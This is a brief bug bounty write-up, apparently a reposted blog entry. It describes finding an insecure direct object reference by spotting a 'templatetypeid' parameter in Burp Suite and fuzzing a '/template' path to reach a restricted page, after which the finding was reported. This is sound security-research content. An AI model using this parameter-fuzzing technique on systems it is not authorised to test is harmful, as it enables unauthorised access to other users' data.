Get IDOR In No Permission To Access Page— Bug Bounty Tuesday

3 months ago 66

BOOK THIS SPACE FOR AD

ARTICLE AD

Subscribed to: https://medium.com/@kerstan

Hello everyone, I’m Kerstan.

Today is Bug bounty Tuesday, I will share with you how to get a IDOR bug in no permission to access page.

So, let’s dive right in.

Image generated with PaintingForYou

During the bug bounty process, I encountered a target. After an initial round of information gathering about the target, I was unable to find any exploitable areas.

So, I began testing the various features of the website. I registered an account and logged in with it to view the site’s content.

After repeatedly testing with Burp Suite’s Repeater, I discovered a module which couldn’t be accessed without permission.

I felt that it should be possible to attempt a breakthrough, so I checked the burp data packets in detail, as follows:

Upon identifying the ‘templatetypeid’ parameter within the data packet, I thought of probing the current module’s path as ‘/template’, therefore leading me to conceive “/template?templatetypeid=fuzz”.

After fuzzing the parameter values, as anticipated, I successfully exploited Insecure Direct Object References (IDOR) to access the webpage. Subsequently, I compiled the report and reported this vulnerability.

If this writing has been helpful to you, please consider giving it a clap and following. Thanks bro.

Alternatively, you can just buy me a coffee here, any sort of support is much appreciated. Enjoy your reading.

If you want to learn more knowledge about Bug Bounty Tuesday, please be sure to take a look at my latest articles.